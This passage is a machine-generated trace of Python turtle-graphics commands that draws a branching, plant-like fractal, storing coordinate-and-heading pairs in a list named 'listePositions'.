pd(), fd(8.0) ;
pu(), setposition((83.86,266.45)), setheading(90.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 67.5), ((95.17,277.76), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((95.17,277.76)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 67.5), ((95.17,277.76), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((95.17,277.76)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 67.5), ((101.29,292.54), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.29,292.54)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 67.5), ((101.29,292.54), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.29,292.54)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 67.5), ((101.29,308.54), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.29,308.54)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 67.5), ((101.29,308.54), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.29,308.54)), setheading(90.0) ;
pu(), setposition((83.86,266.45)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 90.0), ((77.73,281.23), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((77.73,281.23)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 90.0), ((77.73,281.23), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((77.73,281.23)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 90.0), ((77.73,297.23), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((77.73,297.23)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 90.0), ((77.73,297.23), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((77.73,297.23)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 90.0), ((83.86,312.01), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,312.01)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 90.0), ((83.86,312.01), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,312.01)), setheading(67.5) ;
pu(), setposition((83.86,266.45)), setheading(90.0) ;
pu(), setposition((48.98,182.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((42.86,197.04), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,197.04)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((42.86,197.04), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,197.04)), setheading(112.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,211.82)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,211.82)), setheading(112.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 90.0), ((42.86,226.60), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,226.60)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 90.0), ((42.86,226.60), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,226.60)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 90.0), ((42.86,242.60), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,242.60)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 90.0), ((42.86,242.60), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,242.60)), setheading(90.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 90.0), ((36.74,257.38), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,257.38)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 90.0), ((36.74,257.38), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,257.38)), setheading(112.5) ;
pu(), setposition((36.74,211.82)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 112.5), ((25.42,223.13), 112.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((25.42,223.13)), setheading(112.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 112.5), ((25.42,223.13), 135.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((25.42,223.13)), setheading(135.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 112.5), ((19.30,237.92), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((19.30,237.92)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 112.5), ((19.30,237.92), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((19.30,237.92)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 112.5), ((19.30,253.92), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((19.30,253.92)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 112.5), ((19.30,253.92), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((19.30,253.92)), setheading(90.0) ;
pu(), setposition((36.74,211.82)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,227.82), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,227.82)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,227.82), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,227.82)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,243.82)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,243.82)), setheading(90.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 67.5), ((48.05,255.13), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.05,255.13)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 67.5), ((48.05,255.13), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.05,255.13)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 67.5), ((54.17,269.92), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.17,269.92)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 67.5), ((54.17,269.92), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.17,269.92)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 67.5), ((54.17,285.92), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.17,285.92)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 67.5), ((54.17,285.92), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.17,285.92)), setheading(90.0) ;
pu(), setposition((36.74,243.82)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 90.0), ((30.61,258.60), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,258.60)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 90.0), ((30.61,258.60), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,258.60)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 90.0), ((30.61,274.60), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,274.60)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 90.0), ((30.61,274.60), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,274.60)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 90.0), ((36.74,289.38), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,289.38)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 90.0), ((36.74,289.38), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,289.38)), setheading(67.5) ;
pu(), setposition((36.74,243.82)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((42.86,258.60), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,258.60)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((42.86,258.60), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,258.60)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,273.38)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,273.38)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 45.0), ((63.77,279.51), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((63.77,279.51)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 45.0), ((63.77,279.51), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((63.77,279.51)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 45.0), ((75.08,290.82), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((75.08,290.82)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 45.0), ((75.08,290.82), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((75.08,290.82)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 45.0), ((81.20,305.60), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((81.20,305.60)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 45.0), ((81.20,305.60), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((81.20,305.60)), setheading(67.5) ;
pu(), setposition((48.98,273.38)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 67.5), ((48.98,289.38), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,289.38)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 67.5), ((48.98,289.38), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,289.38)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 67.5), ((55.11,304.17), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((55.11,304.17)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 67.5), ((55.11,304.17), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((55.11,304.17)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 67.5), ((66.42,315.48), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,315.48)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 67.5), ((66.42,315.48), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,315.48)), setheading(45.0) ;
pu(), setposition((48.98,273.38)), setheading(67.5) ;
pu(), setposition((48.98,182.26)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((55.11,197.04), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((55.11,197.04)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((55.11,197.04), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((55.11,197.04)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((61.23,211.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((61.23,211.82)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 45.0), ((76.01,217.94), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((76.01,217.94)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 45.0), ((76.01,217.94), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((76.01,217.94)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 45.0), ((87.33,229.26), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((87.33,229.26)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 45.0), ((87.33,229.26), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((87.33,229.26)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 45.0), ((93.45,244.04), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.45,244.04)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 45.0), ((93.45,244.04), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.45,244.04)), setheading(67.5) ;
pu(), setposition((61.23,211.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 67.5), ((61.23,227.82), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((61.23,227.82)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 67.5), ((61.23,227.82), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((61.23,227.82)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 67.5), ((67.35,242.60), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,242.60)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 67.5), ((67.35,242.60), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,242.60)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 67.5), ((78.67,253.92), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
